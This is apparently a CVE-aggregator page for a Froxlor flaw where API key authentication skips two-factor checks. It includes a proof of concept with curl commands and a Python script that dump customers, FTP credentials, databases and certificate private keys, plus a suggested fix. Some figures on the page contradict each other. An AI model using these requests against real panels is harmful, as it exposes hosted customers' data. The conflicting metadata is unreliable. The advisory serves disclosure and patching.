CVE-2026-52793

HIGHPre-NVD 8.18.1
EchelonGraph scoreLOW confidence

This high-severity CVE scores 8.1 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit probability: 0.0%, top 92% of all CVEs by exploit prediction. GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m, epss
8.1
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: 0%CVSS: 8.1Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Froxlor's API Authentication bypasses 2FA Authentication

Summary

Froxlor's API authentication (FroxlorRPC::validateAuth) does not enforce Two-Factor Authentication. When a user (admin or customer) enables 2FA on their account, the web UI correctly requires a TOTP code after password verification. However, the API accepts requests authenticated with only an API key and secret — no TOTP challenge is issued, checked, or required.

An attacker who obtains a leaked API key+secret for a 2FA-protected account has full access to all API operations without providing a second factor.

Affected Code

Web UI — 2FA enforced (index.php:82-149):

if ($result['type_2fa'] != 0) {
    // Redirects to 2FA input page
    // Calls FroxlorTwoFactorAuth::verifyCode()
    // Login is NOT completed without valid TOTP code
}

API — 2FA absent (lib/Froxlor/Api/FroxlorRPC.php:75-105):

private static function validateAuth(string $key, string $secret): bool
{
    $sel_stmt = Database::prepare("
        SELECT ak.*, a.api_allowed as admin_api_allowed,
               c.api_allowed as cust_api_allowed, c.deactivated
        FROM api_keys ak
        LEFT JOIN panel_admins a ON a.adminid = ak.adminid
        LEFT JOIN panel_customers c ON c.customerid = ak.customerid
        WHERE apikey = :ak AND secret = :as
    ");
    $result = Database::pexecute_first($sel_stmt, ['ak' => $key, 'as' => $secret]);
    if ($result) {
        if ($result['apikey'] == $key && $result['secret'] == $secret
            && ($result['valid_until'] == -1 || $result['valid_until'] >= time())
            && (($result['customerid'] == 0 && $result['admin_api_allowed'] == 1)
                || ($result['customerid'] > 0 && $result['cust_api_allowed'] == 1
                    && $result['deactivated'] == 0))) {
            // Checks: key match, secret match, not expired, API allowed, not deactivated
            // Missing: ANY check for type_2fa, TOTP verification, or 2FA status
            return true;
        }
    }
    throw new Exception('Invalid authorization credentials', 403);
}

There are zero references to 2FA, TOTP, type_2fa, or FroxlorTwoFactorAuth in the entire lib/Froxlor/Api/ directory:

$ grep -rn '2fa\|totp\|two.factor\|FroxlorTwoFactor' lib/Froxlor/Api/

(no output)

PoC

Environment

  • Froxlor 2.3.5, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)
  • API enabled (api.enabled=1)
  • Admin account has 2FA enabled (type_2fa=1, TOTP configured)
  • Admin has an API key

Step 1: Confirm 2FA blocks web UI login

POST /index.php HTTP/1.1
Host: panel.example.com
Content-Type: application/x-www-form-urlencoded

loginname=admin&password=Admin123!@#&csrf_token=TOKEN&send=send

Result: Redirect to index.php?showmessage=4 — 2FA page. Login is NOT completed. The user cannot access the dashboard without entering a TOTP code.

Step 2: Authenticate via API — no TOTP required

curl -s -u "API_KEY:API_SECRET" \
  -H 'Content-Type: application/json' \
  -d '{"command":"Customers.listing","params":{}}' \
  https://panel.example.com/api.php

Result: HTTP 200 with full customer listing:

{
  "data": {
    "list": [
      {
        "loginname": "testcust",
        "email": "[email protected]",
        "name": "Test",
        "firstname": "Customer"
      }
    ]
  }
}

No TOTP code was provided. No 2FA prompt was returned. Full access granted.

Step 3: Access additional sensitive resources

All of these succeed without any 2FA challenge:

# Domains
curl -s -u "KEY:SECRET" -d '{"command":"Domains.listing"}' .../api.php

FTP accounts (home directories, credentials)

curl -s -u "KEY:SECRET" -d '{"command":"Ftps.listing"}' .../api.php

Email accounts

curl -s -u "KEY:SECRET" -d '{"command":"Emails.listing"}' .../api.php

MySQL databases

curl -s -u "KEY:SECRET" -d '{"command":"Mysqls.listing"}' .../api.php

SSL certificates (private keys)

curl -s -u "KEY:SECRET" -d '{"command":"Certificates.listing"}' .../api.php

DNS records

curl -s -u "KEY:SECRET" -d '{"command":"DomainZones.listing","params":{"domainname":"example.com"}}' .../api.php

165 API functions are accessible, including write operations (Customers.update, Domains.add, Ftps.add, etc.).

Automated PoC Script

#!/usr/bin/env python3
"""Froxlor <= 2.3.x — 2FA Bypass via API (CWE-287)"""
import json, sys, requests, urllib3
urllib3.disable_warnings()

target, key, secret = sys.argv[1], sys.argv[2], sys.argv[3]

r = requests.post(f"{target}/api.php", auth=(key, secret), json={"command": "Customers.listing", "params": {}}, verify=False) data = r.json()

print(f"HTTP {r.status_code}") if "data" in data: for c in data["data"].get("list", []): print(f" {c['loginname']} | {c['email']}") print(f"\n2FA-protected account accessed without TOTP. {len(data['data'].get('list',[]))} customers exposed.")

Usage: python3 poc.py https://panel.example.com API_KEY API_SECRET

Impact

When a user enables 2FA, they expect all access to their account requires a second factor. The API completely bypasses this expectation:

  • Customer data: PII (name, email, address) readable and modifiable
  • Domains: Full control over domains, subdomains, DNS records
  • Email accounts: Create, read, delete email accounts and forwarders
  • FTP accounts: Access home directory paths and credentials
  • MySQL databases: Full database management
  • SSL certificates: Read private keys, modify certificate bindings
  • 165 API functions: Including all write operations

API keys can be leaked through database backups, log files, config file exposure (GHSA-34qg-65m4-f23m demonstrated DB credential leaks), or compromised automation scripts. Users who enabled 2FA specifically to protect against credential compromise are not protected.

Comparison with CVE-2023-3173

CVE-2023-3173 ("2FA Bypass by Brute Force") was accepted as Critical ($60 bounty) and fixed by adding rate limiting to 2FA verification. This finding is architecturally different — the API authentication path has no 2FA logic at all. No brute force is needed; the second factor is simply never requested.

Suggested Fix

Add 2FA verification to FroxlorRPC::validateAuth(). When the authenticated user has type_2fa != 0, require a TOTP code as an additional API parameter:

// lib/Froxlor/Api/FroxlorRPC.php, after line 100:
// Check 2FA if enabled for this user
if (!empty($result['adminid'])) {
    $user = Database::pexecute_first(
        Database::prepare("SELECT type_2fa, data_2fa FROM panel_admins WHERE adminid = :id"),
        ['id' => $result['adminid']]
    );
} else {
    $user = Database::pexecute_first(
        Database::prepare("SELECT type_2fa, data_2fa FROM panel_customers WHERE customerid = :id"),
        ['id' => $result['customerid']]
    );
}
if ($user && $user['type_2fa'] != 0) {
    // Require X-2FA-Code header or 'totp_code' in request body
    $totp_code = $_SERVER['HTTP_X_2FA_CODE'] ?? null;
    if (empty($totp_code)) {
        throw new Exception('2FA code required', 401);
    }
    $tfa = new FroxlorTwoFactorAuth($user['data_2fa']);
    if (!$tfa->verifyCode($totp_code)) {
        throw new Exception('Invalid 2FA code', 403);
    }
}

Alternatively, disable API key creation for accounts with 2FA enabled, or require 2FA re-verification when generating new API keys.

CVSS v3
8.1
EG Score
8.1(low)
EPSS
7.8%
KEV
Not listed

Published

June 3, 2026

Last Modified

June 3, 2026

Vendor Advisories for CVE-2026-52793(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(1 across 1 ecosystem)
Packagist(1)
PackageVulnerable rangeFixed inDependents
froxlor/froxlor0.10.0 ... 2.3.6 (108 versions)2.3.7

Data Freshness Timeline

(refreshed 5× in last 7d / 31× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-14 16:35 UTCEG score recompute
  2. 2026-07-14 03:26 UTCEG score recompute
  3. 2026-07-12 01:40 UTCEG score recompute
  4. 2026-07-11 12:34 UTCEG score recompute
  5. 2026-07-09 06:31 UTCEG score recompute
  6. 2026-07-08 16:17 UTCEG score recompute
  7. 2026-07-03 19:35 UTCEG score recompute
  8. 2026-07-02 13:49 UTCEG score recompute
  9. 2026-07-02 00:10 UTCEG score recompute
  10. 2026-07-01 11:04 UTCEG score recompute
  11. 2026-06-30 21:46 UTCEG score recompute
  12. 2026-06-30 00:13 UTCEG score recompute
  13. 2026-06-29 10:45 UTCEG score recompute
  14. 2026-06-28 19:38 UTCEG score recompute
  15. 2026-06-28 06:29 UTCEG score recompute
  16. 2026-06-27 17:20 UTCEG score recompute
  17. 2026-06-27 04:14 UTCEG score recompute
  18. 2026-06-26 15:09 UTCEG score recompute
  19. 2026-06-26 01:21 UTCEG score recompute
  20. 2026-06-25 11:26 UTCEG score recompute
  21. 2026-06-24 22:20 UTCEG score recompute
  22. 2026-06-24 09:14 UTCEG score recompute
  23. 2026-06-23 18:57 UTCEG score recompute
  24. 2026-06-20 12:30 UTCEG score recompute
  25. 2026-06-19 20:30 UTCEG score recompute
Show 21 more
  1. 2026-06-18 21:31 UTCEG score recompute
  2. 2026-06-18 07:46 UTCEG score recompute
  3. 2026-06-17 17:48 UTCEG score recompute
  4. 2026-06-17 04:42 UTCEG score recompute
  5. 2026-06-16 15:33 UTCEG score recompute
  6. 2026-06-16 02:26 UTCEG score recompute
  7. 2026-06-15 13:21 UTCEG score recompute
  8. 2026-06-15 00:15 UTCEG score recompute
  9. 2026-06-14 23:18 UTCEPSS rescore
  10. 2026-06-14 11:09 UTCEG score recompute
  11. 2026-06-13 23:00 UTCEPSS rescore
  12. 2026-06-13 22:03 UTCEG score recompute
  13. 2026-06-13 08:58 UTCEG score recompute
  14. 2026-06-12 23:12 UTCEPSS rescore
  15. 2026-06-12 19:52 UTCEG score recompute
  16. 2026-06-12 06:45 UTCEG score recompute
  17. 2026-06-11 17:39 UTCEG score recompute
  18. 2026-06-11 04:34 UTCEG score recompute
  19. 2026-06-10 15:29 UTCEG score recompute
  20. 2026-06-10 02:23 UTCEG score recompute
  21. 2026-06-09 13:18 UTCEG score recompute

Frequently asked(5)

What is CVE-2026-52793?
CVE-2026-52793 is a high vulnerability published on June 3, 2026. Froxlor's API Authentication bypasses 2FA Authentication Summary Froxlor's API authentication (FroxlorRPC::validateAuth) does not enforce Two-Factor Authentication. When a user (admin or customer) enables 2FA on their account, the web UI correctly requires a TOTP code after password verification.…
When was CVE-2026-52793 disclosed?
CVE-2026-52793 was first published in the National Vulnerability Database on June 3, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
Is CVE-2026-52793 actively exploited?
CVE-2026-52793 is not currently on CISA's Known Exploited Vulnerabilities catalog. FIRST EPSS estimates a 7.8% percentile likelihood of exploitation in the next 30 days — higher percentiles indicate greater predicted risk.
What is the CVSS score of CVE-2026-52793?
CVE-2026-52793 has a CVSS v4.0 base score of 8.1 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-52793?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-52793, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-52793

Explore →

Is Your Infrastructure Affected by CVE-2026-52793?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.